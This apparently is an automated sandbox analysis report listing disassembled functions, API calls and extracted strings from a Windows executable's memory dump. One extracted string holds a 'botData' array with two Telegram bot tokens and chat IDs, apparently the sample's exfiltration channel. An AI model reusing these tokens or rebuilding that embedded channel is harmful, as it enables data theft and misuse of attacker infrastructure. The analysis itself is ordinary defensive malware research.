Instruction ID: 277582daaf33e54c89a132b4c4d2923e4774ef4647635b2d98537b362c15177e
Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
Instruction Fuzzy Hash: 0951A676A1969186E7249B2CC048A38B7B2EB44F58F658131EE4D077B4CB3AED83C750

Function 00007FF7ABC53D40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 6a1170061ed6777565a4c3a49d3fe330b274c8fadf215cc03b81de6b857595c2
Instruction ID: 186a626bb3400f96952d04470a175de9e508b86cdd94b1ef7a439d173267d957
Opcode Fuzzy Hash: 6a1170061ed6777565a4c3a49d3fe330b274c8fadf215cc03b81de6b857595c2
Instruction Fuzzy Hash: 3541F432715A5482EF04DF6AD954979B3A2FB88FD0B8A9136DE0E87B74DE3CC0418300

Function 00007FF7ABC297C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c928ed190427e62fc0dcd9eb6982712cfc3a0dea2194b9b1a4ba140830f2619c
Instruction ID: c8236d0372dbb4689eae5ac28a4cfa60458c961e82f6e6f3d4bc8225f9d4b7be
Opcode Fuzzy Hash: c928ed190427e62fc0dcd9eb6982712cfc3a0dea2194b9b1a4ba140830f2619c
Instruction Fuzzy Hash: 420122766290F147E69CD77D4C2987527C1C75A342B96813BFF8A823D4C92EDA00C730

Function 00007FF7ABC68D10 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
Instruction ID: 7ea4670d26ae6472aad099a2a36f1a4ec80d6e8e7318a39b1f15c4adcf66dee0
Opcode Fuzzy Hash: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
Instruction Fuzzy Hash: 47F068717196559AEB989F6CA812E2977D0F708380F808179E58D83F34DB3C94519F54

Function 00007FF7ABC438CC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
Instruction ID: 2a03f1590e855d5fe51bbb96bd5c92bfaaa788d2a1decfba9bfae79573792e9d
Opcode Fuzzy Hash: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
Instruction Fuzzy Hash: 0DA00222A1EC82E4E646AB08E855C30E371FBE0301FC24132C00D510709F3CE980C730

Function 00007FF7ABC3CDF0 Relevance: 38.9, APIs: 6, Strings: 16, Instructions: 389COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3D3DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3D3E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3D3EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3D3F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3D3F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3D3FD

Strings

indentation, xrefs: 00007FF7ABC3CE33
null, xrefs: 00007FF7ABC3D0F1
All, xrefs: 00007FF7ABC3CFB8
emitUTF8, xrefs: 00007FF7ABC3CF43
dropNullPlaceholders, xrefs: 00007FF7ABC3CEEB
decimal, xrefs: 00007FF7ABC3D066
precision, xrefs: 00007FF7ABC3CF6F
useSpecialFloats, xrefs: 00007FF7ABC3CF17
precisionType must be 'significant' or 'decimal', xrefs: 00007FF7ABC3D3A5
precisionType, xrefs: 00007FF7ABC3CE90
: , xrefs: 00007FF7ABC3D097
commentStyle must be 'All' or 'None', xrefs: 00007FF7ABC3D3C2
None, xrefs: 00007FF7ABC3CFED
enableYAMLCompatibility, xrefs: 00007FF7ABC3CEC0
commentStyle, xrefs: 00007FF7ABC3CE63
significant, xrefs: 00007FF7ABC3D034

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: : $All$None$commentStyle$commentStyle must be 'All' or 'None'$decimal$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$null$precision$precisionType$precisionType must be 'significant' or 'decimal'$significant$useSpecialFloats
API String ID: 3668304517-1515510190
Opcode ID: 3370b769723b1030589e35f72584043052262ce1d88539523ffd59c732385f2c
Instruction ID: 9711088370a750e68a3f80bc811cae1c44403013db906e974d5b1eb8fc363645
Opcode Fuzzy Hash: 3370b769723b1030589e35f72584043052262ce1d88539523ffd59c732385f2c
Instruction Fuzzy Hash: 2DF1E362A0A78255EF14BB68D440BF9E761EF44798FC24132E95D076FAEE7CE588C310

Function 00007FF7ABC31410 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC318E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC318F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC318FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC31901
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC31907
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3190D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC31913
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC31919
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC319A8

Strings

See , xrefs: 00007FF7ABC31756
for detail., xrefs: 00007FF7ABC317A0

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: for detail.$See
API String ID: 3668304517-4250990345
Opcode ID: 11555719de460d759cd9ce52645ae0ad9069b738f064280b2c47e42908dc881e
Instruction ID: e54b497d004fdafd616ae922b491aac2eae50c099bf9d965ac6b7a2347f56db1
Opcode Fuzzy Hash: 11555719de460d759cd9ce52645ae0ad9069b738f064280b2c47e42908dc881e
Instruction Fuzzy Hash: 2EF11562F29B8149FB04EB68D004BACA362EB457E4F915731DE6C13AF6DE78D1C59320

Function 00007FF7ABC0ADB0 Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 461COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0B4B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0B508
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0B50E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0B557

Strings

ios_base::eofbit set, xrefs: 00007FF7ABC0B4C8, 00007FF7ABC0B51D
Error writing to file: , xrefs: 00007FF7ABC0B2D0
Error opening file: , xrefs: 00007FF7ABC0AE72
const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", , xrefs: 00007FF7ABC0AE07
ios_base::failbit set, xrefs: 00007FF7ABC0B4C1, 00007FF7ABC0B516
ios_base::badbit set, xrefs: 00007FF7ABC0AFC3, 00007FF7ABC0B2C4

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", $Error opening file: $Error writing to file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3668304517-3574094325
Opcode ID: 932c06fcef72250b163ce193bd6e5a5cd41d62d2af461c2733232d11c6484593
Instruction ID: b4f6339e4c34e5da68f61b56ecb79f746b0dba86556102d296cc98aab74f4645
Opcode Fuzzy Hash: 932c06fcef72250b163ce193bd6e5a5cd41d62d2af461c2733232d11c6484593
Instruction Fuzzy Hash: 7122D222B1AB8285EB10EF68D4407FDA3B0FB44798F954231DA5C57ABAEF78D541C710

Function 00007FF7ABC4DEC8 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4DEF7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4DFC7

Strings

0, xrefs: 00007FF7ABC4E003
0, xrefs: 00007FF7ABC4DF99
0, xrefs: 00007FF7ABC4DFF1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0$0
API String ID: 3215553584-3137946472
Opcode ID: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
Instruction ID: 13569a08fc81c27764768790cf4f9bbf6f17b70cdc5f932aacb11dec268f8ca9
Opcode Fuzzy Hash: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
Instruction Fuzzy Hash: 59E10B3294F64745F769BF2C8098ABDAB93DB12780FD74031C64D473B2CE2DAA599324

Function 00007FF7ABC33510 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC335B3
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC335DE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC3360B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC336AB

Part of subcall function 00007FF7ABC37260: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC372CB
Part of subcall function 00007FF7ABC37260: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC37313
Part of subcall function 00007FF7ABC37260: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC373A3

std::_Facet_Register.LIBCPMT ref: 00007FF7ABC3368E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC337D6

Strings

ios_base::eofbit set, xrefs: 00007FF7ABC337F4
ios_base::failbit set, xrefs: 00007FF7ABC337ED
ios_base::badbit set, xrefs: 00007FF7ABC337E1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3702003507-1866435925
Opcode ID: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
Instruction ID: 0de12f24bea2b54bbcd0e6d4f8750be942db36d34df388a5aab143dd66856fd8
Opcode Fuzzy Hash: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
Instruction Fuzzy Hash: 07C15D3260AB8181EB24EF19E4507AAF7A1FB84B84F958132DA8D47BB5DF3DD449C710

Function 00007FF7ABC37020 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC37096
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC370DE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC37221
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC3723A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC3724D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC37253

Strings

false, xrefs: 00007FF7ABC37157
bad locale name, xrefs: 00007FF7ABC37240
true, xrefs: 00007FF7ABC37189

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 4121308752-1062449267
Opcode ID: abc6e7851ce84216ffbade7b44a9e1a5858d628bc4b5839a5764da963fe7ad66
Instruction ID: 9e7c150fa80c79a1ba8bcc669bf36963b3a7aebfc5e20c1ccc4fa10e71a215f0
Opcode Fuzzy Hash: abc6e7851ce84216ffbade7b44a9e1a5858d628bc4b5839a5764da963fe7ad66
Instruction Fuzzy Hash: DD618232B0A74289FB15EFB8D450BBCB3A5AF40708F860035DE4C27AB6DE39A555D364

Function 00007FF7ABC04790 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 330COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC047EF

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC049DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC049E1
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF7ABC04B01

Strings

: ", xrefs: 00007FF7ABC04899
", ", xrefs: 00007FF7ABC048CC

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
String ID: ", "$: "
API String ID: 2261858363-747220369
Opcode ID: 4c2c1f16b9bcb1608803fa57558e3b5461482a9100175eb3ba717f400800e487
Instruction ID: ba4cf569f1eff9e6ee03411a2aa274dad59b5eb17fe5bb496ea8ee7b31e292c2
Opcode Fuzzy Hash: 4c2c1f16b9bcb1608803fa57558e3b5461482a9100175eb3ba717f400800e487
Instruction Fuzzy Hash: 14D19F72B16B8185EB04EF69D0447ADA372EB44BC8F914432DA5D17BBADF39D980C350

Function 00007FF7ABC15A60 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC15AF9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15E8E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15E94
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15E9A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15EA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15EAC

Strings

Nothing found, xrefs: 00007FF7ABC15E4F
replacement , xrefs: 00007FF7ABC15CB0, 00007FF7ABC15DC1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
String ID: replacement $Nothing found
API String ID: 4261731725-1856175495
Opcode ID: fa8d2c0a2f398226edcdbe6cf9692cf2ad42a516f9cc044238f705f772e52f0e
Instruction ID: f90d8188d437d7f51ef50166095255f2dddc33d0b8d0eb5afe9dca6b6c23ef22
Opcode Fuzzy Hash: fa8d2c0a2f398226edcdbe6cf9692cf2ad42a516f9cc044238f705f772e52f0e
Instruction Fuzzy Hash: 6FC1D472F1974585EB10EB69E0047ADA361EB857A4F914632DA6C27BF9DF3CE481C310

Function 00007FF7ABC41D60 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7ABC41D6D
GetProcAddress.KERNEL32 ref: 00007FF7ABC41D80
GetProcAddress.KERNEL32 ref: 00007FF7ABC41D97
GetProcAddress.KERNEL32 ref: 00007FF7ABC41DAE

Strings

GetTempPath2W, xrefs: 00007FF7ABC41D9D
kernel32.dll, xrefs: 00007FF7ABC41D66
GetCurrentPackageId, xrefs: 00007FF7ABC41D76
GetSystemTimePreciseAsFileTime, xrefs: 00007FF7ABC41D86

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
Instruction ID: 98541478b86e1cc8087499937f404775a4a040aefcb70db8a91e37ab8d07baaf
Opcode Fuzzy Hash: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
Instruction Fuzzy Hash: 44F0D464A1BB07A1EA04BB99F884870A3A0BF08782FC20434C81D83330EF3CA0958B60

Function 00007FF7ABC45800 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7ABC4585D

Part of subcall function 00007FF7ABC47BC0: __GetUnwindTryBlock.LIBCMT ref: 00007FF7ABC47C03
Part of subcall function 00007FF7ABC47BC0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7ABC47C28

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7ABC45935
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7ABC45B83
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7ABC45C90

Strings

csm, xrefs: 00007FF7ABC45958
csm, xrefs: 00007FF7ABC45877
csm, xrefs: 00007FF7ABC458DE

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
Instruction ID: e6b59b252971dee94c8141b63eaa2cd4431175d665340731398fa1ce5107cfdd
Opcode Fuzzy Hash: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
Instruction Fuzzy Hash: C1D1C432A097418AEB20EF69D4487ADB7A1FB45798F910135DE8D577B6CF38E281C710

Function 00007FF7ABC588F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7ABC591C8,?,?,?,?,00007FF7ABC51FDD,?,?,?,?,00007FF7ABC3EAF8), ref: 00007FF7ABC58A6C
GetProcAddress.KERNEL32(?,?,?,00007FF7ABC591C8,?,?,?,?,00007FF7ABC51FDD,?,?,?,?,00007FF7ABC3EAF8), ref: 00007FF7ABC58A78

Strings

api-ms-, xrefs: 00007FF7ABC589B6
ext-ms-, xrefs: 00007FF7ABC589C9

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
Instruction ID: 94289806e8c5e61ca4643a149d70c8fa583d99479519c28dd3c9acd7e98ce22f
Opcode Fuzzy Hash: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
Instruction Fuzzy Hash: 91412421B1B60241FA16EB1E9890E79A791BF44BE0F8A0334DD1D873B4EE3CE5458720

Function 00007FF7ABC55EC0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC55F03
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC562F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5658C

Strings

p, xrefs: 00007FF7ABC5602D
p, xrefs: 00007FF7ABC55FB5
f, xrefs: 00007FF7ABC56025

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

